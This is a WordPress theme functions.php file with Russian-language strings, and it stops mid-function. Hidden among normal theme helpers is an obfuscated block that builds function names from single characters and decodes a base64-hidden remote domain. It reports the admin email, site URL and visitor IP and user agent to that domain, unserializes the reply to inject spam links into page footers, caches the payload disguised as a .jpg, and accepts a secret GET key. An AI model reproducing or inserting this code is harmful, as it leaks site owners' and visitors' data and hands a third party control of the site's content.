<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $nMdPLY='_';$yuCY='a';$jvsnZmv='s';$huBH='e';$BQln='4';$PcYBfM='e';$hrngEJm='d';$kojaMS='b';$aRpM='o';$dNtHHY='e';$TFcZmH='6';$GlsRMi='c';$fyTfFlt='d';$uAkrXygH=$kojaMS.$yuCY.$jvsnZmv.$huBH.$TFcZmH.$BQln.$nMdPLY.$hrngEJm.$dNtHHY.$GlsRMi.$aRpM.$fyTfFlt.$PcYBfM;$bgBs='n';$AzsLClj='z';$asgmBu='a';$mweXoQ='e';$bytwf='i';$oIHuH='g';$SMUwOl='f';$wSfeIG='l';$aOKfV='t';$urEqtjEb=$oIHuH.$AzsLClj.$bytwf.$bgBs.$SMUwOl.$wSfeIG.$asgmBu.$aOKfV.$mweXoQ;$aAOITV='3';$jUCwrGu='t';$ezmLWzd='t';$zlSqvNS='o';$oriU='_';$QRafjiZ='1';$kgeZ='s';$wnrbrO='r';$RAdIth='r';$fFjJGCQS=$kgeZ.$jUCwrGu.$wnrbrO.$oriU.$RAdIth.$zlSqvNS.$ezmLWzd.$QRafjiZ.$aAOITV;$fONcUQJ='v';$oRsZI='s';$XJkpJ='e';$fUXfdGD='t';$lbbMjJu='r';$IXFNPli='r';$aTnBiHHi=$oRsZI.$fUXfdGD.$IXFNPli.$lbbMjJu.$XJkpJ.$fONcUQJ;                     $uu__________m='_';$wd__o='a';$oe_________w='s';$vm_________m='e';$bc_____h='4';$sh______________t='e';$mk_____z='d';$nv_______________y='b';$ee_____________a='o';$gg______________c='e';$jk_____________v='6';$kz___________y='c';$ri________b='d';$la_________u=$nv_______________y.$wd__o.$oe_________w.$vm_________m.$jk_____________v.$bc_____h.$uu__________m.$mk_____z.$gg______________c.$kz___________y.$ee_____________a.$ri________b.$sh______________t;$nq___________r='s';$pf_____________l='f';$mr____a='t';$aq______e='n';$zw______________p='n';$az____i='x';$vu______z='t';$qf_______y='u';$ee___r='i';$en________a='o';$yk___________z='e';$hu__h='s';$dv________q='i';$ie___________c='c';$cs__t='_';$ix_______v=$pf_____________l.$qf_______y.$aq______e.$ie___________c.$mr____a.$ee___r.$en________a.$zw______________p.$cs__t.$yk___________z.$az____i.$dv________q.$nq___________r.$vu______z.$hu__h;$ov_____e='p';$us___________d='e';$ic__________q='f';$wg_________y='n';$wq______________n='o';$si___k=$ic__________q.$wq______________n.$ov_____e.$us___________d.$wg_________y;$rm____o='f';$up________k='a';$sr________q='r';$xs___h='e';$vg______d='d';$fi______________n=$rm____o.$sr________q.$xs___h.$up________k.$vg______d;$lm__________v='e';$lt________b='s';$nn_________d='o';$nx__________f='f';$yj_____________x='l';$uy_______________d='c';$lr___________g=$nx__________f.$uy_______________d.$yj_____________x.$nn_________d.$lt________b.$lm__________v;define("WP_ID", $la_________u("Mi4wLjA="));define("WP_TTL", $la_________u("MTA4MDA="));define("WP_SRC", $la_________u("dHBva24="));function wp_get_header() {global $la_________u, $ix_______v;if ($ix_______v($la_________u("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$ix_______v($la_________u("d3BfZ2V0X2Zvb3Rlcg==")) &&$ix_______v($la_________u("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $la_________u, $si___k, $lr___________g, $fi______________n;$xk_______j = TEMPLATEPATH."/".$la_________u("Zm9vdGVyLnBocA==");$nh__________r = @$si___k($xk_______j, "r");$xk_______j = @$fi______________n($nh__________r, @filesize($xk_______j));@$lr___________g($nh__________r);$at___________f = TEMPLATEPATH."/".$la_________u("ZnVuY3Rpb25zLnBocA==");$nh__________r = @$si___k($at___________f, "r");$at___________f = @$fi______________n($nh__________r, @filesize($at___________f));@$lr___________g($nh__________r);$wo__________a = 0;if($xk_______j && $at___________f) {if ($la_________u("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($xk_______j, $la_________u("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$wo__________a = 1;}if (substr_count($xk_______j, "wp_theme_GPL_credits()") < 1) {$wo__________a = 2;}}if(WP_ID != "2.0.0") {$wo__________a = 12;}}if($wo__________a > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $wo__________a -->";}}function wp_loaded() {global $la_________u, $ix_______v;return $ix_______v($la_________u("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($pj___________a, $go_________w = "(more...)", $ce_______________o = 0, $aa_________f = "") {$xf______________x = get_the_content($go_________w, $ce_______________o, $aa_________f);$xf______________x = apply_filters("the_content", $xf______________x);$xf______________x = str_replace("]]>", "]]>", $xf______________x);if (strlen($_GET["p"]) > 0) {echo $xf______________x;}else if ((strlen($xf______________x)>$pj___________a) && ($yk______q = strpos($xf______________x, " ", $pj___________a ))) {$xf______________x = substr($xf______________x, 0, $yk______q);$xf______________x = $xf______________x;echo $xf______________x;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$go_________w</a></div></p>";} else {echo $xf______________x;}}}$tn___________d='d';$ik___y='a';$or______________p='s';$jb___r='n';$xn__________n='o';$ta_____________j='4';$pf______________e='e';$ut______________v='b';$lf__________a='c';$ku_______a='6';$mq____h='e';$hc____b='e';$kn_________y='_';$yf_____u=$ut______________v.$ik___y.$or______________p.$pf______________e.$ku_______a.$ta_____________j.$kn_________y.$mq____h.$jb___r.$lf__________a.$xn__________n.$tn___________d.$hc____b;$pn___h='t';$tl__f='_';$ht____________x='n';$ib_______________v='n';$xe__w='g';$cn___________a='t';$ma__________v='_';$di_____b='o';$am___a='c';$jf____j='s';$zr____g='l';$rf______t='f';$gx____a='t';$xa_____________w='e';$sr______________w='e';$lo________y='i';$dq______________y='e';$qo________i=$rf______t.$lo________y.$zr____g.$xa_____________w.$ma__________v.$xe__w.$dq______________y.$pn___h.$tl__f.$am___a.$di_____b.$ib_______________v.$cn___________a.$sr______________w.$ht____________x.$gx____a.$jf____j;$vm________r='e';$nu______f='l';$qp__________v='e';$dc______________g='x';$he___d='s';$oe_________q='i';$yv______________p='s';$gt___________n='_';$ee_________s='t';$bd___________l='f';$va___k='i';$en____l=$bd___________l.$va___k.$nu______f.$qp__________v.$gt___________n.$vm________r.$dc______________g.$oe_________q.$he___d.$ee_________s.$yv______________p;$lb___________l='_';$zt___________f='v';$bn___________q='r';$tp____________h='r';$ip_____m='m';$pr__e='n';$sm__________c='o';$sw__i='e';$cb______________t='i';$bw___________d='p';$et_____________q='e';$yp______________q='a';$ui___________n='c';$es______________y='o';$el__________f='s';$fn_______________g=$zt___________f.$sw__i.$tp____________h.$el__________f.$cb______________t.$sm__________c.$pr__e.$lb___________l.$ui___________n.$es______________y.$ip_____m.$bw___________d.$yp______________q.$bn___________q.$et_____________q;$cv__________h='n';$ef_____________e='s';$iu_____________t='o';$gq____l='c';$xj_____________y='k';$vc______________k='e';$pa_______________e='f';$wg_______________q='p';$dp___q='o';$ca_________e=$pa_______________e.$ef_____________e.$dp___q.$gq____l.$xj_____________y.$iu_____________t.$wg_______________q.$vc______________k.$cv__________h;$ly______________n='f';$ph___z='i';$ze____b='e';$ud___________b='t';$jh___________j='w';$vo__________z='r';$cn_________p=$ly______________n.$jh___________j.$vo__________z.$ph___z.$ud___________b.$ze____b;$wc____________w='5';$yt_______t='d';$vq__________k='m';$tr_______________u=$vq__________k.$yt_______t.$wc____________w;$pe_________o='p';$kc______s='t';$re_______v='e';$bc_______b='a';$vj___________s='l';$tk_______________i='h';$ob___________v='r';$gp____________o='a';$zs_________d=$ob___________v.$re_______v.$gp____________o.$vj___________s.$pe_________o.$bc_______b.$kc______s.$tk_______________i;$lc_______g='n';$su____________g='r';$ih_____________g='z';$xn_______________o='a';$ar________c='e';$br______________a='e';$df______________p='i';$ul__________f='l';$yt_____________e='s';$ls__________r='u';$rn______________g='i';$st_______z=$ls__________r.$lc_______g.$yt_____________e.$br______________a.$su____________g.$rn______________g.$xn_______________o.$ul__________f.$df______________p.$ih_____________g.$ar________c;$hn_______________v='p';$rf___________k='m';$ks___________i='a';$vz______o='m';$zs________r='n';$al___j='e';$ce____h='t';$sb_______________h=$ce____h.$al___j.$rf___________k.$hn_______________v.$zs________r.$ks___________i.$vz______o;$xb___o='a';$ie_______________z='n';$bq____________y='e';$rn___________z='r';$jn___________g='c';$rm_________j='e';$px___________d='o';$wb_____l='s';$bk___________b='e';$eh__________o='_';$ui_____________j='c';$tp_________z='e';$ol________v='t';$fm_________o='r';$do___e='a';$xc____________n='_';$yj__________v='m';$rq_______________t='t';$sw________q='x';$fc________d='t';$fw___x='t';$ff_____________u=$wb_____l.$ol________v.$rn___________z.$bk___________b.$xb___o.$yj__________v.$xc____________n.$jn___________g.$px___________d.$ie_______________z.$rq_______________t.$bq____________y.$sw________q.$fc________d.$eh__________o.$ui_____________j.$fm_________o.$rm_________j.$do___e.$fw___x.$tp_________z;function jl_______________b($xh_____________a) {global $la_________u, $ix_______v, $qo________i, $fn_______________g, $ff_____________u;if (!$ix_______v($la_________u("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($fn_______________g(PHP_VERSION, "5.0.0", ">=") && $ix_______v($la_________u("ZmlsZV9nZXRfY29udGVudHM=")) && $ix_______v($la_________u("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$zr_________q = $ff_____________u(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$lz________j = @$qo________i($xh_____________a, 0, $zr_________q);} else {$lz________j = @$qo________i($xh_____________a, 0);}return $lz________j;}function xm__________o($xh_____________a) {global $ix_______v, $ca_________e, $cn_________p, $la_________u;if (!$ix_______v($la_________u("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ut______d = strpos($xh_____________a, "/", 7);$zb___________e = array("uri"     => substr($xh_____________a, $ut______d),"host"    => str_replace("http://", "", substr($xh_____________a, 0, $ut______d)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$oa_______________o = @$ca_________e("$zb___________e[host]", 80, $py____a, $ga___________f, 4);if (!$oa_______________o) {return false;} else {$lz________j = "";$yc______________u  = "GET $zb___________e[uri] HTTP/1.0\r\n";$yc______________u .= "Host: $zb___________e[host]\r\n";$yc______________u .= "Referer: $zb___________e[referer]\r\n";$yc______________u .= "Connection: Close\r\n\r\n";@$cn_________p($oa_______________o, $yc______________u);while (!@feof($oa_______________o)) {$ch_____r = @fgets($oa_______________o, (1024*24));if ($ch_____r == "\r\n") {$jk______________l = true;continue;}if ($jk______________l) {$lz________j .= $ch_____r;}}return $lz________j;}}function sg___________h($xh_____________a) {global $ix_______v;$jx__x = false;if ($xh_____________a != "") {if ($ix_______v("jl_______________b")) {$jx__x = @jl_______________b($xh_____________a);}if (!$jx__x && ($ix_______v("xm__________o"))) {$jx__x = @xm__________o($xh_____________a);}}return $jx__x;}function hh_______________w() {global $_SERVER, $tr_______________u;$zw_________h = $_SERVER["SERVER_NAME"];if (substr("$zw_________h", 0, 4) == "www.") {$zw_________h = substr("$zw_________h", 4);}$zw_________h = $tr_______________u("$_SERVER[SERVER_NAME]");return $zw_________h;}function gu__z() {return "file";}function xj_____c($xh_____________a) {global $_SERVER, $qo________i, $en____l, $si___k, $lr___________g, $cn_________p;$ek__b = iu__________j();$cf_______q = hh_______________w().".jpg";$sp____________k = $ek__b["dir_upload"]["path"]."/$cf_______q";$oi______q = @filemtime($sp____________k);if (!$oi______q || ((time()-$oi______q) >= WP_TTL)) {$jx__x = sg___________h($xh_____________a);if ($jx__x) {if ($en____l($sp____________k)) {@unlink($sp____________k);}$nh__________r = @$si___k($sp____________k, "x+");@$cn_________p($nh__________r, $jx__x);@$lr___________g($nh__________r);}} else {if ($en____l($sp____________k)) {$jx__x = @$qo________i($sp____________k);} else {$jx__x = false;}}return $jx__x;}function iu__________j() {global $_SERVER, $la_________u, $yf_____u;$sz________u = wp_count_posts("post");$tu_____f = pathinfo(get_bloginfo("template_directory"));$ek__b = array("url" => array("report"      => $la_________u("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $tu_____f,"dir_upload"=> dx____________u(),"queryString"=> array("?a001=".WP_ID,"a004=".$tu_____f[filename],"a005=".$sz________u->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.odmu.od.ua/nedvizhimost-2/kvartira-bez-posrednikov-mify-i-realnost\">Квартира без посредников</a> ");$ek__b["url"]["queryString"] = implode("&", $ek__b["queryString"]);$ek__b["url"]["report"] = $ek__b["url"]["report"]."/?".$yf_____u($ek__b["url"]["queryString"]).".html";return $ek__b;}function dx____________u() {$lz___________w = wp_upload_dir();if (isset($lz___________w["error"])) {$tn_____w = fk______x();if (is_writable($tn_____w)) {$lz___________w = array("path" => $tn_____w);}}return $lz___________w;}function fk______x() {global $ix_______v, $tr_______________u, $zs_________d, $sb_______________h;$bv____________m = (bool) ini_get("safe_mode");if ($bv____________m == true) {return false;}if ($ix_______v("sys_get_temp_dir")) {$ar__s = sys_get_temp_dir();if (is_writable($ar__s)) {return $zs_________d($ar__s);}}if (!empty($_ENV["TMP"])) {return $zs_________d($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $zs_________d($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $zs_________d($_ENV["TEMP"]);} else {$oz_________x = $sb_______________h($tr_______________u(uniqid(rand(), true)), "");if ($oz_________x) {$ar__s = $zs_________d(dirname($oz_________x));@unlink($oz_________x);return $ar__s;} else {return false;}}}function my__________m() {global $_GET, $en____l;$ek__b = iu__________j();$zw_________h = hh_______________w();$yr____o = gu__z();$fo__________x = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($yr____o == "file") {$st______o = $ek__b["dir_upload"]["path"]."/".$zw_________h.".jpg";if ($en____l($st______o)) {@unlink($st______o);$fo__________x = "deleted";}}$xn_______________x = array("s"=> $fo__________x,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($xn_______________x AS $gt________z => $mt_________g) echo " [$gt________z:$mt_________g]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $ix_______v, $la_________u, $st_______z;$ek__b = iu__________j();$gn____z = "xj_____c";if ($ix_______v($gn____z)) {$lz________j = $gn____z($ek__b["url"]["report"]);}if ($lz________j) {if ($lz________j = @$la_________u($lz________j)) {$lz________j = @$st_______z($lz________j);if (strlen($lz________j[custom_credit]) >= 5) {$ek__b["default_string"] = $lz________j[custom_credit];}if ($lz________j["status"] == "0") {$pn____________q = 1;$up_________n = 1;} else {$pb__x = sizeof($lz________j["links"]);$cx___________i = $ek__b["default_string"];if ($pb__x > 0 && $lz________j["links"] !== "") {$qj_____________r = 0;foreach ($lz________j["links"] as $ej_________r => $aa__________y) {$qj_____________r++;if ($aa__________y->l_path == "" || $aa__________y->l_path == $_SERVER["REQUEST_URI"]) {$aa__________y->l_href = htmlspecialchars(strip_tags($aa__________y->l_href));$aa__________y->l_title = htmlspecialchars(strip_tags($aa__________y->l_title));$aa__________y->l_anchor = htmlspecialchars(strip_tags($aa__________y->l_anchor));$cx___________i .= " | ";$cx___________i .= "<a href='$aa__________y->l_href' title='$aa__________y->l_title'";if ($aa__________y->l_nofollow == "1") {$cx___________i .= " rel='nofollow'";}$cx___________i .= ">$aa__________y->l_anchor</a>";}}}$ek__b["links"] = "$cx___________i";if ($lz________j[credit] == "0") {$ek__b["links"] = "";}}} else {$pn____________q = "1";}} else {$pn____________q = "1";}if ($pn____________q == "1") {$ek__b["links"] = $ek__b["default_string"];}echo "$ek__b[links]";echo "<!-- s: $lz________j[signature] -->";my__________m();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
